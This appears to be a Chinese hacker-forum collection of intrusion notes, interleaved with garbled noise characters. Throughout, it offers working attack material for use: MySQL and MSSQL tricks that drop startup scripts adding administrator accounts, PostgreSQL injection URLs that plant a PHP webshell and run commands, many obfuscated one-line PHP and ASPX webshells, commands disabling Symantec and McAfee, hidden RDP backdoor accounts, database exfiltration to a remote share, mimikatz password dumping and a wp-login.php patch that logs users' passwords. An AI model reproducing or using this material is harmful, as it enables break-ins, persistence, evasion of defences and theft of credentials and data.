" @8 P1 }9 I- G1 K& B% C
- Q+ x W$ K W! Z# H5 o中文版本操作系统中针对mysql添加用户完整代码:
+ u$ _2 M S% A
7 J. d# z; G8 L/ Z" tuse test;
7 U9 H+ n$ I5 C7 ~create table a (cmd text);; n, I7 X/ K5 ]" [5 X
insert into a values ("set wshshell=createobject (""wscript.shell"") " );
f' B4 S3 o( O% b% ^: b; yinsert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
; r1 Z, n2 Z, w! ]$ U) ]2 _& \$ \insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
+ L) X8 T8 d+ E. ~select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";
6 O4 @( j/ x- |# Z6 n2 q: Odrop table a;! R/ L/ |) u2 ~9 l
9 s+ F3 C1 g; ~2 P$ n英文版本: V$ f$ D+ o$ a3 D& F0 g6 v0 Z
0 j5 k( ^9 D$ Zuse test;
! \& B/ |! }4 L# hcreate table a (cmd text);0 {. Q/ b2 \" E. y
insert into a values ("set wshshell=createobject (""wscript.shell"") " );
$ y. c4 Q- `$ S3 J2 Tinsert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
3 K! s+ t N( Winsert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
! _+ v7 b5 @# |9 P; |( \, w+ t3 Z) Cselect * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";) u5 }& a6 S" ~8 ], p( S, v
drop table a;9 f S" H3 j, @- e3 m. v6 Q9 ?7 x
7 i5 e6 U0 ]$ ^7 r6 ]create table a (cmd BLOB);
/ R1 c& {8 v/ l$ x8 Sinsert into a values (CONVERT(木马的16进制代码,CHAR));5 s1 o, Q$ R& g! \$ J. ~7 w& T
select * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe'
0 E% j: R+ @+ }* K* N- idrop table a;+ y8 v J2 E5 K
3 s8 ]0 L9 J0 n" t记录一下怎么处理变态诺顿
# K; _( L' n# s. W4 r7 ]. `. D查看诺顿服务的路径4 Z2 s8 ^0 g% N2 F4 N0 e0 b o
sc qc ccSetMgr
0 s# J# {) V6 ^4 w e然后设置权限拒绝访问。做绝一点。。
3 c" R. d# j8 d" v# \/ zcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system
+ J' \( V# A, B$ ^, Fcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER") I" V3 o8 v7 b
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators8 i6 z7 N, b, h+ m O
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone
6 P' `5 A; p) w! z9 w& G/ G+ y
) V, |/ C1 u5 W" I9 }然后再重启服务器
1 {$ H2 s- f+ Yiisreset /reboot
0 u1 g; a9 O0 E) O这样就搞定了。。不过完事后。记得恢复权限。。。。
" E# u2 |% Z; V, G( i3 Acacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F! J0 K! X9 m1 H3 r: C, v0 m) D
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F
5 Q5 A7 P6 Z+ Ncacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F
$ K: j8 h7 x9 r4 C ^% i8 p6 F5 R: Rcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F; V* ~' ?/ r; |1 p3 v5 L9 p! e d: y
SELECT '<%eval(request(chr(35)))%>' into [fuck] in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin2 M' p. y! L1 \
% t% O4 P6 N0 [; l; K( rEXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')8 L; m( V8 l# L8 Y# J# N$ @5 X5 \
; D, J/ r1 z; Z) T5 r P$ l
postgresql注射的一些东西( x6 _) u4 c- f2 e* R
如何获得webshell
" J- J: _' i }: }( M* Z, {http://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null); ) |& R6 R |+ d* y+ a" X, d" i
http://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$);
1 h4 E0 v0 }+ E0 f4 m. w- G( @ E8 jhttp://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;7 L9 k$ o" l' S8 g6 d* ^+ u
如何读文件
- |& K+ d! v5 e( V( Yhttp://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);0 C' x% N: \4 K) `1 n
http://127.0.0.1/postgresql.php?id=1;copy myfile from ‘/etc/passwd’;$ M4 l' a5 c. |9 k' O2 F- {4 p
http://127.0.0.1/postgresql.php?id=1;select * from myfile;
: G2 z, |, {# C/ Z1 L2 ^3 v
9 a* P8 X; |* J1 I2 Uz执行命令有两种方式,一种是需要自定义的lic函数支持,一种是用pl/python支持的。% s6 a7 i3 G/ R2 R6 y6 p T
当然,这些的postgresql的数据库版本必须大于8.X
; }, i7 p4 i9 t2 \; e3 j创建一个system的函数:# S7 J \) C+ q1 U" i
CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT
8 m/ D; s3 H5 y' {( {9 L1 _& q9 B1 j
- X( ^* j5 k% i8 v* C) }+ ^6 s创建一个输出表:* {4 t7 X" @, ~$ ^+ u9 h/ B
CREATE TABLE stdout(id serial, system_out text)
+ A# r' L5 H) G5 [3 g7 D# B7 C, M8 U6 G% c; ~% s4 F" N% b
执行shell,输出到输出表内:5 J4 Q$ F5 l0 r" J. `% v
SELECT system('uname -a > /tmp/test')
0 L9 o& H* S$ F# H9 a* a
& T) t @0 u! r2 O. y5 }0 p, I6 Fcopy 输出的内容到表里面;
' a& H/ I1 Q" L" q3 k* TCOPY stdout(system_out) FROM '/tmp/test'5 |+ Y4 u! o/ ?4 ?
5 R. Z1 A C2 ?- s6 H+ N" D
从输出表内读取执行后的回显,判断是否执行成功2 U5 j. |, `' r0 D- }- A7 v' d9 m
2 z6 U: w# R/ ~# ] ~SELECT system_out FROM stdout
1 ?$ h) N5 T/ O8 r8 r+ e/ W下面是测试例子
" u) t0 ~2 r5 x. x6 {: p7 y" b, z' L/ L$ t1 P1 O! Z7 z K+ ]
/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) --
( V0 h* P( z6 I, P& W x) W* {: c, ?
/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C'' I7 g x0 N9 ?' H" \' f
STRICT --: V7 J5 j; n3 v; u) ^: b
8 E! x$ m; |) X" ~
/store.php?id=1; SELECT system('uname -a > /tmp/test') --" N% [/ [/ [$ L4 w5 K# b. J5 X
8 A6 I" _# S1 n) b- s' `/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --3 X, F# f9 W& n) q0 p
! f. [) q' @% b$ U+ `. o" X
/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--% d! x% ~; I* G. Y
net stop sharedaccess stop the default firewall
9 O# @% {* `; y" }: |netsh firewall show show/config default firewall) I. K' t0 I+ @* b/ Z3 I
netsh firewall set notifications disable disable the notify when the program is disabled by the default firewall8 y- V% C5 t% e+ L* @
netsh firewall add allowedprogram c:\1.exe Svchost add the program which is allowed by default firewall% M, T2 R- R; w( ^7 _
修改3389端口方法(修改后不易被扫出)
; Y8 Q6 d% \2 G' f1 Z5 f) N( W修改服务器端的端口设置,注册表有2个地方需要修改/ u3 N2 t' C% A& N+ `! M
% F* R; ` y! i0 u1 t; Z
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp]) b3 _! n5 O! f3 h1 Y# z: i' E
PortNumber值,默认是3389,修改成所希望的端口,比如6000, W9 W; I! R% T
. v- Z. ]( n2 Z8 }, g; G% `第二个地方:
6 R0 j$ {( F. h) h5 j3 J8 W- X[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp] y! Y9 [$ N9 T0 C; Z: [5 C2 U7 t
PortNumber值,默认是3389,修改成所希望的端口,比如60004 |# c; p* P6 F$ X. U7 [" R8 b
h) F; O1 o+ C现在这样就可以了。重启系统就可以了
6 h) ]9 {* `4 J- R
3 O+ ^$ M4 E* f6 l8 W5 c查看3389远程登录的脚本7 {+ R7 r* ~0 U; r% e. u a+ f
保存为一个bat文件8 [5 d, c; a& ]) Z7 @* Y
date /t >>D:\sec\TSlog\ts.log! m, P: Z+ y' E! k
time /t >>D:\sec\TSlog\ts.log: x" t6 m$ k! P' f6 k( S
netstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log
7 V! m6 E k: A& v& V) jstart Explorer
, _+ i7 l' i0 L0 _6 b8 X3 i' _! r ]/ Y
mstsc的参数:' ]+ A! {! T. L* h! R
$ c# |0 C- c! { v% l6 H8 c
远程桌面连接# e0 W6 R! r9 S( |; T
) J: A3 R7 W( J
MSTSC [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]
3 X/ k' h; K. d4 H7 ^8 n [/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?
4 V. H+ U3 | R. ~& X# r
5 K* {" i, ~& |) w" N/ \<Connection File> -- 指定连接的 .rdp 文件的名称。
! f/ m8 K4 _: P4 X+ ]* n: W8 h
0 C( `2 ^3 D! G* f4 _/v:<server[:port]> -- 指定要连接到的终端服务器。7 \" b: [- g, @5 l* ?) }) E5 s
7 s) x: Q5 q2 e5 n
/console -- 连接到服务器的控制台会话。
' Z1 F2 }- d& n" P
9 R# z" ]4 C7 s- J9 b. ^/f -- 以全屏模式启动客户端。
7 U! I: u" X. c* h( E" l
, A! k" [: }1 _4 V4 A/w:<width> -- 指定远程桌面屏幕的宽度。$ {6 s/ S) n9 j. T: _; U
- }7 x: |" Y; Z5 @/h:<height> -- 指定远程桌面屏幕的高度。
& r: W# ]- B& a( N9 ^5 q$ V) H: D0 L& s
/edit -- 打开指定的 .rdp 文件来编辑。
2 N K+ X* |. ]8 f! Z( l! O4 f) z7 O G, o
/migrate -- 将客户端连接管理器创建的旧版
$ C5 ~# B) o3 T C6 D+ C连接文件迁移到新的 .rdp 连接文件。
1 ]& F6 P, v7 k! \9 ] n8 Y- S) k# ]- ?
' }: {$ [0 o6 [9 \其中mstsc /console连接的是session 0,而mstsc是另外打开一个虚拟的session,这样的话就是相当与另外登陆计算机。也就是说带console参数连接的是显示器显示的桌面。大家可以试试啊,有的时候用得着的,特别是一些软件就
' t9 y# V* `7 |( X$ ?: jmstsc /console /v:124.42.126.xxx 突破终端访问限制数量: j/ P7 B% D) a; ?
" a& F1 l; R4 [命令行下开启3389! o J: R2 A2 z4 |1 F. P
net user asp.net aspnet /add
8 H& G2 j$ M( Y4 \# k* ]) S/ e: qnet localgroup Administrators asp.net /add' U8 a6 R: ?9 H/ s
net localgroup "Remote Desktop Users" asp.net /add3 g& E- e+ t8 R" x( s/ K4 O% {8 v
attrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D
, X6 U {8 b" d4 d U- [% d. K4 pecho Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0+ V- u! w! S7 a; X4 _
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 10 D* B3 `. I( t3 |2 s& j; J0 ~
echo Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f
0 w9 y- S% [6 M9 a( N# `, s; qsc config rasman start= auto
" b5 t6 p! J- s8 k, J* usc config remoteaccess start= auto
7 _% R9 v% X/ Q0 p2 q/ {net start rasman- T" H9 ]) Q( Y' ~$ ]/ J
net start remoteaccess
+ i2 A, `* S4 x6 o/ O9 _Media
# h1 D) M& H8 M5 Q) e<form id="frmUpload" enctype="multipart/form-data") |; W- h0 C7 P% @7 A( p1 l
action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>
: y* c$ M( L# E. c* a<input type="file" name="NewFile" size="50"><br>
, y2 {: `2 Y( H( c5 e' K% u<input id="btnUpload" type="submit" value="Upload">
7 `0 A# _; |' r: W" g</form>
8 z: T' x8 n- l$ s- Z+ Y/ V) a- r: x2 t$ A3 w
control userpasswords2 查看用户的密码
* [- C( ]+ C' L0 V5 v6 C7 Maccess数据库直接导出为shell,前提a表在access中存在。知道网站的真实路径( V5 t( Q. N# s6 t9 z6 w# t" w
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
2 J/ x# C7 }# X9 q P
7 O1 P8 A" E) z" h9 p$ {& A# I141、平时手工MSSQL注入的时候如果不能反弹写入,那么大多数都是把记录一条一条读出来,这样太累了,这里给出1条语句能读出所有数据:- i. R7 n' L& w/ d6 L1 S9 }2 {1 A
测试1:
, @, |* ^) B8 v. OSELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t17 {) _! e2 a! z
" K1 O* c: S3 v2 D5 p测试2:* K! y2 u$ U7 ]4 ~' I( Z; G
9 n6 S4 g+ A! c# ~# ^7 D7 |* Pcreate table dirs(paths varchar(100),paths1 varchar(100), id int)
$ D2 m: ]) J4 c! J0 @" Z
! z# J( `* s; Q7 y2 j/ O7 `! |delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--: I9 r( @6 s/ }6 c0 u. S
3 m8 h: u, `; r2 o7 O W# dSELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
1 @) [# f0 X$ M5 C) X; A7 K4 q( Y关闭macfee软件的方法://需要system权限,请使用at或psexec –s cmd.exe命令7 x9 l5 v/ _- L# g m
可以上传.com类型的文件,如nc.com来绕过macfee可执行限制;
4 b# @# R2 K; T" ]# a( b* }net stop mcafeeframework
G" d" K' [! O8 O& S- Knet stop mcshield
" J( @, }6 u- P9 |, @2 ^% u( Znet stop mcafeeengineservice
: H3 Z5 a" z& ]4 Xnet stop mctaskmanager
' ~' `' B0 J( Q; ~& Whttp://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D
5 q# t5 \# L# z; V, ]
- m9 G, L* V1 e1 y$ R" ?, J VNCDump.zip (4.76 KB, 下载次数: 1)
4 z4 C3 Y. s5 l0 |8 }密码在线破解http://tools88.com/safe/vnc.php
: w- s9 X% s. n2 ?VNC密码可以通过vncdump 直接获取,通过dos查询[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] 下的Password也可以获取
; E/ X4 ?5 l+ O# n; O( {1 f' M" {$ o0 z) y8 n! E+ W
exec master..xp_cmdshell 'net user'3 g7 S+ _ N: S8 U' d" B9 L
mssql执行命令。8 J9 U6 W0 S6 N2 t. d
获取mssql的密码hash查询5 q+ X M/ j- Z, P( f' R+ a p
select name,password from master.dbo.sysxlogins0 n; w. F) E; a, [! o* ]# Y/ X3 N
" x" V+ p" R1 A# M
backup log dbName with NO_LOG;/ G% ~9 @: M" h7 B! \7 C: |
backup log dbName with TRUNCATE_ONLY;% V% M- _- N/ b; f
DBCC SHRINKDATABASE(dbName);
# N8 _+ f% b! H6 amssql数据库压缩
% K3 M% O( q1 b' ?3 N x: m4 p q! _/ ]4 N) `9 p' E
Rar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK
4 X V4 v' Y3 g3 R- v1 c将game_db_201107170400.BAK文件压缩为1.rar,大小为200M的分卷文件。
9 a* B6 X2 b* O5 }0 U& q9 G1 \# {3 ]' k7 x& I
backup database game to disk='D:\WebSites\game.com\UpFileList\game.bak'
& p' r! ? C5 a& a# Y) m备份game数据库为game.bak,路径为D:\WebSites\game.com\UpFileList\game.bak
, A. X& T. t0 W0 y; i& [/ L+ ^; O6 ?, i6 `+ t' }
Discuz!nt35渗透要点:
( L. {0 t6 L6 e! b' b* r' a(1)访问 网站地址/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default$ a) b6 k1 c* p6 S
(2)打开rss.aspx文件,将<%@ Page Inherits="Discuz.Web.UI.RssPage" %>复制到本地备份,然后替换其为<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>
& L' [8 S: `; W. L# ] p$ ^(3)保存。
' p: r5 V7 b$ l3 Q( r& @) R(4)一句话后门地址http://somesite.com.cn/tools/rss.aspx 密码为pass; J& u# j; V( O9 ^
d:\rar.exe a -r d:\1.rar d:\website\
8 L: @; t0 g# e: W9 L递归压缩website
7 O' K0 F. t& ^: F注意rar.exe的路径
* W G% }2 i3 J
+ ^" [6 O/ y/ {- Y4 {0 `# M<?php) d: M& k5 J. M6 l9 I4 c1 j6 ]3 U: w
& Y. ?% }: }1 v3 s$telok = "0${@eval($_POST[xxoo])}";
. I/ w3 a( V5 Y: Z F
5 m2 M0 R* y& t3 u" {$username = "123456";0 `; |1 W' F A6 W [2 R
' y2 C- |7 n9 @* l: n% h' }) |$ {
$userpwd = "123456";
" a7 d/ p. z& j
) V$ K9 j$ |3 J; {( M1 p' Z$telhao = "123456";% c6 W& w2 \$ P# w& G
/ B7 F9 j" R( d% s7 h
$telinfo = "123456";8 c: d, O9 `2 B0 s
: X+ O2 E" J% t% O" S?>
4 S- }6 C9 S9 m+ Kphp一句话未过滤插入一句话木马
4 j; f; N$ V" p: g" G) e: I( ?& g! M! i% W6 j; \$ ^
站库分离脱裤技巧
( A, z8 c/ K' r5 C9 J: Lexec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'+ j# \1 z& c f0 Y5 }# E/ d9 z
exec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'7 V) J% g7 y' q! H
条件限制写不了大马,只有一个一句话,其实要实现什么完全够了,只是很不直观方便啊,比如tuo库。! x" ]3 G4 z2 A2 q
这儿利用的是马儿的专家模式(自己写代码)。: `5 y7 \- ~. h/ X
ini_set('display_errors', 1);
8 {9 }: W! V/ ?! [* Tset_time_limit(0);7 }3 A% V. f. z
error_reporting(E_ALL);. r/ m+ V1 j* d) z
$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());
% Z( y0 ]- ]( R, \+ R5 O: h+ Ymysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());
3 f+ B' w6 W* T, N$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());0 A7 G% @9 S& ?+ |) W& R
$i = 0;
2 j6 D7 `1 U' N% K. T1 b, @8 H$tmp = '';& Q5 \$ N. t& Z1 o+ O
while ($row = mysql_fetch_array($result, MYSQL_NUM)) {
2 _3 s8 Z" }: v6 q6 G $i = $i+1;! U, E4 m9 _, a6 C! _1 |
$tmp .= implode("::", $row)."\n";
0 V0 Y* y8 q( b8 }& F& J) T if(!($i%500)){//500条写入一个文件
& F9 J' B B% h0 n8 } $filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';
) }$ A4 _' m8 Q: J! W/ w3 [. d- M file_put_contents($filename,$tmp);2 W% H9 e, c9 f2 i5 d L
$tmp = '';
2 h9 q9 f* m/ b( k/ c1 g& s }
3 h6 }; Q/ }$ M' o7 m' R* J" `! W}8 m3 n, Z; d2 Z
mysql_free_result($result);. }+ M+ D) R; F, W9 `9 q- E( R
5 W$ t6 Z1 M1 H' W- h9 T7 \4 d1 z
- G: @" G% L x* Z//down完后delete
1 p) y6 N& e8 e6 w5 a
+ x6 |1 L/ M; z3 `3 r1 n
# X- I! U" T! |9 w0 yini_set('display_errors', 1);' g% w0 H& J p9 y {+ X" }
error_reporting(E_ALL);6 ~3 a, g& v; A" C+ V( _9 i+ z8 E, E
$i = 0;( l7 w" Q; k! E4 L' S+ e( l( j
while($i<32) {
; X" A+ F, {* ~& O, w+ ]' S" W9 u $i = $i+1;
9 l* @9 L1 L1 e. G $filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';9 D5 @0 r# P5 u' H$ `9 M7 Z. v
unlink($filename);) e# T/ Z3 A' n2 o% @
} 5 R4 ~6 s" F9 k7 W0 T
httprint 收集操作系统指纹
2 `5 b+ O- e7 K2 g% d扫描192.168.1.100的所有端口* j* p2 r' z& D( K# H- x
nmap –PN –sT –sV –p0-65535 192.168.1.100, D& }/ C; p9 t' f
host -t ns www.owasp.org 识别的名称服务器,获取dns信息
! W5 U/ ]3 I; ~' _% c8 W; C& L2 vhost -l www.owasp.org ns1.secure.net 可以尝试请求用于owasp.org的区域传输
6 s4 s1 G4 |$ ?6 E' z( d VNetcraft的DNS搜索服务,地址http://searchdns.netcraft.com/?host* G: j; Z7 i1 |! K) u* j, v
2 i H" l+ @2 v
Domain tools reverse IP: http://www.domaintools.com/reverse-ip/ (需要免费注册)' K5 m& C6 O4 F1 ~ T/ N8 `; |
' L) n7 X3 d1 u6 p: K' M! ^" H+ n
MSN search: http://search.msn.com 语法: "ip:x.x.x.x" (没有引号)# \( v+ y" f! J, j% b8 j
* D4 r. W/ [, n4 D( h7 U2 L% S
Webhosting info: http://whois.webhosting.info/ 语法: http://whois.webhosting.info/x.x.x.x
. g" a6 j! K2 H3 K% g# E1 ]
* s7 K$ j+ X( c, ] DNSstuff: http://www.dnsstuff.com/ (有多种服务可用)$ }- H" Y' w; F, H2 g$ I+ P0 I0 v
4 \; \9 C, n( D8 I& P
http://net-square.com/msnpawn/index.shtml (要求安装)+ `0 n# A4 A, ?' m/ F1 j
1 \' }. `/ R& j5 r( u. q tomDNS: http://www.tomdns.net/ (一些服务仍然是非公开的)
8 g0 v2 r: ~) K. y W: h4 B4 \: ?8 r
7 _, _+ U( }9 l' ^9 J& | SEOlogs.com: http://www.seologs.com/ip-domains.html (反向IP/域名查找)) t/ b3 w3 }5 H- O) R' i3 K# E
set names gb23128 i9 B( Z1 t4 L/ ]$ Y+ u' j, E
导入数据库显示“Data too long for column 'username' at row 1”错误。原因是不支持中文。% X! E2 n' ]/ {7 Y. |6 [/ n/ h
0 d4 a( C% E4 e/ H5 }mysql 密码修改
+ k( a" E1 L9 c- u! r1 cUPDATE mysql.user SET password=PASSWORD("newpass") whereuser="mysqladmin ”
* b* y0 n9 V; B( i8 Q, Uupdate user set password=PASSWORD('antian365.com') where user='root';
" ^% x: u7 x) @( s$ R& Rflush privileges;3 ]: Z) t; v- b+ @, X
高级的PHP一句话木马后门* u7 }% E, N( E6 w2 `4 F+ s8 ~6 D; z
3 o- s' h4 R9 a R# ~入侵过程发现很多高级的PHP一句话木马。记录下来,以后可以根据关键字查杀
O9 J6 f6 I" z( d0 B7 c; `
5 {2 }: v& {* w" w: a) d* x/ f! B1、& ?5 A0 i# l* S& _
1 W/ R% y1 T- K' {1 A
$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
2 L, U& N8 K% z9 u% ^9 L7 w, x6 u8 v- g
$hh("/[discuz]/e",$_POST['h'],"Access");
/ Z- V! N* _. h: R8 j. Q/ F, Q' P8 `2 D2 }7 }5 q' p
//菜刀一句话$ ~0 G9 p# L! ?8 ^
1 L- v1 R1 D( c8 O2、1 y; [/ A2 n/ p% q- R8 r2 l
0 n [7 V; S7 @, m
$filename=$_GET['xbid'];
" y$ E8 j$ {: q. t+ Z5 I" ^9 `5 T+ |2 K$ ?$ [; F8 I9 ^' Y) V- x. Z
include ($filename);
) r6 B" H( w6 W# y6 u5 o
* l7 F4 U& c+ H: ?$ M, Y//危险的include函数,直接编译任何文件为php格式运行
, e6 s! K8 \% P8 ? F1 O; L3 P. l. R& A- L
3、3 k7 L% P# I& H/ n: I
- c( S7 Z3 E2 o, ]
$reg="c"."o"."p"."y";$ Y2 t+ D7 b- g. H% L! D
& `8 T* l2 N/ t$ k; Z' ~$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);
4 I7 v* Y& u, z, D( ]' g) e1 u7 Q( k) J9 h6 e
//重命名任何文件
+ N9 Y4 h; Z/ v
E$ \6 B& t% Q5 }4、9 b7 {* k: U A% @: Y
( V! ?0 G- F$ B2 N+ \
$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";5 A6 k5 Q* v' @/ ^: D. u$ ?
. b" I; n2 I! m3 z ]
$gzid("/[discuz]/e",$_POST['h'],"Access");0 o- E" ?, R. X, |, m$ T' M
- D6 `/ S" T5 o; C//菜刀一句话
. f$ _) P8 V/ F# D$ n: c1 \: B: |8 b4 q& a
5、include ($uid);
( q, ]- V( J5 s. F
, z3 s! t6 y. O. F! a//危险的include函数,直接编译任何文件为php格式运行,POST
+ _) H3 L/ t1 E: n" {4 L5 M& W
; Z4 L# f* U ?( V
- e- b2 O) t5 A9 t! ]9 J//gif插一句话8 Y" k% h4 r% w s {3 S1 }
$ ~7 ~7 p/ `5 ]# ~" X) K6、典型一句话
9 U g) t0 j e! x% Q: J% ~6 `8 w0 [. A# y8 ^5 V
程序后门代码
; J: M9 m6 {2 v<?php eval_r($_POST[sb])?>8 @6 g& l/ I$ \- J- C3 x* M
程序代码; K7 H* H& ?1 y% h; ]
<?php @eval_r($_POST[sb])?>
. @% i5 @/ L, o. K$ D//容错代码
- w3 R; x; a. L( R" o1 S# |程序代码
1 w& X# L& Y: e d<?php assert($_POST[sb]);?>
% Y T; Y: G8 J7 ?$ p0 N//使用lanker一句话客户端的专家模式执行相关的php语句5 Q7 h1 C) C1 h, D
程序代码
- l/ J- N/ F* H+ G<?$_POST['sa']($_POST['sb']);?>0 E; ?5 U2 Q9 P+ D
程序代码
6 W- t& D; J& r4 R# ~1 c4 F+ N+ {" A<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>
, \) J! r" l) q# U1 V程序代码
8 d/ {, \5 s/ g<?php
. h$ X1 n3 Q. r9 U+ H) B* [0 Q@preg_replace("/[email]/e",$_POST['h'],"error");* y5 {7 W8 N: ]; ?$ r
?>* h# h# H8 w) J0 H2 j2 j. S+ m, f
//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入" Z ^+ X0 k/ H) N/ C- _
程序代码
$ _5 @1 [1 C7 ~1 @4 z# ]<O>h=@eval_r($_POST[c]);</O>
' I }, w3 W) ]3 y程序代码
9 U5 h) Y* \( \8 l7 y& r% E$ t0 Q<script language="php">@eval_r($_POST[sb])</script>
6 s6 a0 v ^' a# J& Z3 t" E- q//绕过<?限制的一句话* K* P# M' b1 P
/ A. z5 h) t* h$ H$ b; u
http://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip
8 Z0 U0 H/ a7 c详细用法:. {) u: n% S3 C2 F; L" X8 x9 ]
1、到tools目录。psexec \\127.0.0.1 cmd
6 E1 }: `; d, e9 M- T x/ a, X2、执行mimikatz( w1 z: w" W1 ?; q o9 y
3、执行 privilege::debug* H; y( S$ b. D2 ]: h- L( T" A
4、执行 inject::process lsass.exe sekurlsa.dll2 H/ j; p- `( A$ W' y
5、执行@getLogonPasswords* {, T6 v2 E9 ^# M$ @: L
6、widget就是密码1 m: A4 R) I/ \" e& B& ]' K: R4 L5 z
7、exit退出,不要直接关闭否则系统会崩溃。6 h- x. Q" T4 A/ L
3 k) t8 j# }$ W, x5 B: Whttp://www.monyer.com/demo/monyerjs/ js解码网站比较全面
# ?2 Q7 F! s* I- w* L8 T9 [5 o0 w
x) F8 H. g. x$ g, c自动查找系统高危补丁
$ a0 l) f$ q' Y$ r& }systeminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt
) L6 I/ K6 [8 \% E- l* V/ F% ?9 f; A1 p C
突破安全狗的一句话aspx后门5 T, \" s1 Z; }
<%@ Page Language="C#" ValidateRequest="false" %>
& h1 w' H) O0 \# F& V$ v<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>" Q: B5 W! G! C7 w- \; o
webshell下记录WordPress登陆密码
4 h6 D6 W! k( I; Z- Cwebshell下记录Wordpress登陆密码方便进一步社工
, Y) q5 q% h# ?在文件wp-login.php中539行处添加:
9 e* Z% G) a+ u; Y& c// log password" }7 b0 x7 ~# t4 p& m
$log_user=$_POST['log'];! T" N' L3 ?$ `6 i" E
$log_pwd=$_POST['pwd'];7 a/ K1 O x F# G4 k- P
$log_ip=$_SERVER["REMOTE_ADDR"];* [" z P0 C) L2 _
$txt=$log_user.’|’.$log_pwd.’|’.$log_ip;
1 E3 m% r; [% {: |! f! t7 z$txt=$txt.”\r\n”;
& Q# G$ x3 H- X8 c* n4 u$ ]if($log_user&&$log_pwd&&$log_ip){
) Y% B0 @5 ~, @+ m5 |@fwrite(fopen(‘pwd.txt’,”a+”),$txt);- i* W* r& }( @" _+ E( V% v7 K3 x
}
